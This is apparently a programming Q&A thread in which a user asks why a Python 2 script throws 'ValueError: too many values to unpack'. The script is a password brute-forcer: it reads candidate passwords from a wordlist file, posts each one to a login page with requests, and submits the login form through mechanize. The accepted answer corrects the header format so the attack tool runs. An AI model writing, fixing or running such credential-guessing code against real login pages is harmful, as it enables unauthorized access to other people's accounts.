# how to fix ValueError in python

Tags: python, python-2.7

guys i have this code but when i execute response is ValueError: too many values to unpack... where is my issues?

```
#!usr/bin/python

import requests
import mechanize
import sys

class Explot(object):
    def __init__(self):
        self.url = 'https://example.com/auth/login/'
        self.listbr= open('Force.txt','r').readlines()
        self.PodHtUsear=str(raw_input('Ingresa Nombre Del Campo Del Usuario ::: ' + ' '))
        self.PasHtUsearP=str(raw_input('Ingresa Nombre Del Campo De la Contraseña ::: ' + ' '))
        self.IngrDa=str(raw_input('Ingresa Usuario :::' + ' '))
        for line in self.listbr:
            self.passd=line.strip()
            self.http=requests.post(self.url, data={'%s'%self.PodHtUsear:self.IngrDa,
                                                    '%s'%self.PasHtUsearP:self.passd,
                                                    'login':'submit'})
            content = self.http.content
            sys.stderr.write('password cracked: : : ' + self.passd + '\n')
            self.Solmen(True,False)


    def Solmen(self,FormeHttp,DisfoHttp):
        nav = mechanize.Browser()
        nav.set_handle_robots(DisfoHttp)
        nav.set_handle_equiv(FormeHttp)
        nav.set_handle_referer(FormeHttp)
        nav.set_handle_redirect(FormeHttp)
        nav.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=0.1)
        nav.addheaders = [('User-agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36')]
        nav.open('%s'%self.url)
        nav.select_form(nr=0)
        nav.form['%s'%self.PodHtUsear] = self.IngrDa
        nav.form['%s'%self.PasHtUsearP]=self.passd
        submi= nav.submit()
        print ('Url : %s'%submi.geturl())


if __name__=='__main__':
    PostMe = Explot()
```

Traceback:

```
Traceback (most recent call last):
File "C:\Users\admin\Desktop\cb1.py", line 41, in <module> PostMe = Explot()
File "C:\Users\admin\Desktop\cb1.py", line 21, in init self.Solmen(True,False) 
File "C:\Users\admin\Desktop\cb1.py", line 32, in Solmen nav.open('%s'%self.url
File "build\bdist.win32\egg\mechanize_mechanize.py", line 203, in open return self._mech_open(url, data, timeout=timeout)
File "build\bdist.win32\egg\mechanize_mechanize.py", line 230, in mech_open response = UserAgentBase.open(self, request, data)
File "build\bdist.win32\egg\mechanize_opener.py", line 188, in open req = meth(req) 
File "build\bdist.win32\egg\mechanize_urllib2_fork.py", line 1062, in do_request for name, value in self.parent.addheaders:
ValueError: too many values to unpack
```

Comment: How about including the traceback in your question? That will tell you which line the problem is on.

Comment: Traceback (most recent call last):

  File "build\bdist.win32\egg\mechanize\_urllib2_fork.py", line 1062, in do_request_
    for name, value in self.parent.addheaders:
ValueError: too many values to unpack

Comment: Traceback (most recent call last):
  File "C:\Users\admin\Desktop\cb1.py", line 41, in <module>
    PostMe = Explot()
  File "C:\Users\admin\Desktop\cb1.py", line 21, in __init__
    self.Solmen(True,False)
  File "C:\Users\admin\Desktop\cb1.py", line 32, in Solmen
    nav.open('%s'%self.url)

Comment: File "build\bdist.win32\egg\mechanize\_mechanize.py", line 203, in open
    return self._mech_open(url, data, timeout=timeout)
  File "build\bdist.win32\egg\mechanize\_mechanize.py", line 230, in _mech_open
    response = UserAgentBase.open(self, request, data)
  File "build\bdist.win32\egg\mechanize\_opener.py", line 188, in open
    req = meth(req)
  File "build\bdist.win32\egg\mechanize\_urllib2_fork.py", line 1062, in do_request_
    for name, value in self.parent.addheaders:
ValueError: too many values to unpack

Comment: You could just edit your question to include the traceback

Comment: this is all traceback

Answer (score 1):

The traceback indicates you passed the wrong value to addheaders.

Mechanize expects a list of 2-tuples for headers and instead you passed it a list of strings.

Try:

```
nav.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36')]
```